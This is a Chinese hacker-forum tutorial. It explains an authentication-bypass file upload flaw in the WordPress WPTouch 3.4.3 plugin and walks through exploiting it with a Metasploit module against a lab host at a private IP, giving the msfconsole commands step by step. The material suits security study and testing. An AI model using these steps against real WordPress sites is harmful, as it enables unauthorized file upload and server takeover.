渗透测试实战教程:利用WordPressWpToud插件的文件上传漏洞绕过身份验证的上传任意文件

zevseo
12640zevseo大版主
2018-09-11 03:05:41
12640 2018-09-11 03:05:41
WordPress WPTouch插件包含绕过身份验证的文件上传漏洞。在后端索引页面上创建wp-nonce(CSRF令牌),并使用相同的令牌通过插件处理ajax文件上传。通过上传捕获的随机数,我们可以将任意文件上传文件夹中。因为插件也使用它自己的文件上传机制而不是wordpress api,所以可以上传任何文件类型。提供的用户不需要特殊权限,具有“贡献者”角色的用户可能会被滥用。
利用目标
Wp touch 3.4.3
需求
攻击者:kali Linux
受害者PC:Windows 7
打开Kali终端类型  msfconsole

描述:利用WordPressWpToud插件的文件上传漏洞

图片:利用WordPressWpToud插件的文件上传漏洞2 (1).png

利用WordPressWpToud插件的文件上传漏洞

现在输入  exploit use / unix / webapp / wp_ wptouch_file_upload
msf exploit (wp_wptouch_file_upload)>set targeturi /wordpress
msf exploit (wp_wptouch_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_wptouch_file_upload)>set username admin
msf exploit (wp_wptouch_file_upload)>set password admin123
msf exploit (wp_wptouch_file_upload)>set rport 80
msf exploit (wp_wptouch_file_upload)>exploit

描述:利用WordPressWpToud插件的文件上传漏洞

图片:利用WordPressWpToud插件的文件上传漏洞8.png

利用WordPressWpToud插件的文件上传漏洞

本文标题:渗透测试实战教程:利用WordPressWpToud插件的文件上传漏洞绕过身份验证的上传任意文件
本文作者:zevseo
本文来自:蚁安黑客官网
转载请注明本文链接:http://bbs.mayidui.net/t2318.html
游客
登录黑客论坛后才可以回帖,黑客登录 或者 注册黑客
weixin
蚁安黑客

找黑客工具、找黑客教程、找黑客朋友,你想不到的黑客技术这儿都有!

微信号:baiyiwangan